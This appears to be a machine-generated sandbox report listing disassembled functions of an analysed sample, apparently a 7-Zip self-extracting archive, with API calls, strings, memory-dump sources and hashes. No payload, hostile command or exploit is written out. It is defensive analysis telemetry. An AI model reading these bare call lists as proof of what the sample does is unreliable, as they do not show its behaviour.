                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: %%T/$%%T\
                                          • API String ID: 613200358-2679640699
                                          • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                          • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                          • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                          • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                          Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: %%S/$%%S\
                                          • API String ID: 613200358-358529586
                                          • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                          • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                          • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                          • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                          Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: %%M/$%%M\
                                          • API String ID: 613200358-4143866494
                                          • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                          • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                          • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                          • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                          Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ExceptionThrow
                                          • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                          • API String ID: 432778473-803145960
                                          • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                          • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                          • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                          • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                          Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                            • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                            • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                            • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@$??3@$memmove
                                          • String ID: IA$IA$IA
                                          • API String ID: 4294387087-924693538
                                          • Opcode ID: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                          • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                          • Opcode Fuzzy Hash: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                          • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                          Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                          • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                          • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                          • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@??3@ExceptionThrowmemcpy
                                          • String ID: IA
                                          • API String ID: 3462485524-3293647318
                                          • Opcode ID: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                          • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                          • Opcode Fuzzy Hash: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                          • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                          Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: wsprintf$ExitProcesslstrcat
                                          • String ID: 0x%p
                                          • API String ID: 2530384128-1745605757
                                          • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                          • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                          • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                          • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                          Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                            • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                          • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                          • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                          • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$??3@
                                          • String ID: 100%%
                                          • API String ID: 2562992111-568723177
                                          • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                          • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                          • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                          • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                          Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • wsprintfW.USER32 ref: 00407A12
                                            • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                            • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                          • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: TextWindow$ItemLength$??3@wsprintf
                                          • String ID: (%u%s)
                                          • API String ID: 3595513934-2496177969
                                          • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                          • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                          • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                          • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                          Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                          • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32
                                          • API String ID: 2574300362-3846845290
                                          • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                          • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                          • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                          • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                          Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32
                                          • API String ID: 2574300362-3900151262
                                          • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                          • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                          • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                          • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                          Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                          • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32
                                          • API String ID: 2574300362-736604160
                                          • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                          • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                          • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                          • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                          Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                            • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1731127917-0
                                          • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                          • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                          • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                          • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                          Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                          • wsprintfW.USER32 ref: 00403FFB
                                          • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: PathTemp$AttributesFilewsprintf
                                          • String ID:
                                          • API String ID: 1746483863-0
                                          • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                          • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                          • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                          • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                          Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: CharUpper
                                          • String ID:
                                          • API String ID: 9403516-0
                                          • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                          • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                          • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                          • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                          Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                          • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                          • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                            • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
